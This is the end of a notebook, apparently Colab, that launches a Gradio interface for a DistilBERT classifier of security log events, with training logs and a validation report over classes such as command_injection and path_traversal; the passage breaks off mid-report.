    update_status_button.click(get_model_status_ui, inputs=None, outputs=model_status_text_ui)
    retrain_full_button.click(gradio_retrain_full, inputs=[samples_per_cat_input, epochs_for_retrain_input], outputs=retrain_full_status_text)
    demo.load(get_model_status_ui, inputs=None, outputs=model_status_text_ui) # Initial status load


if __name__ == "__main__":
    print("🚀 Launching LLMGuardian Transformer System v3...")
    # Important: First run will train the initial model.
    # Deleting the './tf_sec_model' directory will force a full retrain on next launch.
    demo.launch(
        share=True,
        debug=True
    )

🤖 Using device: cuda


/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_auth.py:94: UserWarning: 
The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.
  warnings.warn(


tokenizer_config.json:   0%|          | 0.00/48.0 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/483 [00:00<?, ?B/s]

vocab.txt:   0%|          | 0.00/232k [00:00<?, ?B/s]

...

⚠️ Initializing a new base model (distilbert-base-uncased).


Xet Storage is enabled for this repo, but the 'hf_xet' package is not installed. Falling back to regular HTTP download. For better performance, install the package with: `pip install huggingface_hub[hf_xet]` or `pip install hf_xet`


model.safetensors:   0%|          | 0.00/268M [00:00<?, ?B/s]

Some weights of DistilBertForSequenceClassification were not initialized from the model checkpoint at distilbert-base-uncased and are newly initialized: ['classifier.bias', 'classifier.weight', 'pre_classifier.bias', 'pre_classifier.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


🧠 No trained/compatible model found. Initiating first-time training...
♻️ Generating new training dataset (80 samples/cat)...
Generated dataset for training/validation: 912 total samples.
Starting full model training (5 epochs)...
🚀 Starting Training for 5 epochs on 729 samples...
  Epoch 1/5, Batch 18/92, Loss: 2.0690
  Epoch 1/5, Batch 36/92, Loss: 1.9127
  Epoch 1/5, Batch 54/92, Loss: 1.3689
  Epoch 1/5, Batch 72/92, Loss: 1.2696
  Epoch 1/5, Batch 90/92, Loss: 0.5907

  Epoch 1 Summary: Avg Training Loss: 1.5680
--- Validation Set Performance ---
Avg Loss: 0.6170, Accuracy: 0.9891
                      precision    recall  f1-score   support

     brute_force_log       1.00      1.00      1.00        16
   command_injection       1.00      1.00      1.00        21
exploitation_attempt       1.00      0.90      0.95        21
       malware_comms       1.00      1.00      1.00        16
      path_traversal       1.00      1.00      1.00        16
       safe_activity       0.97   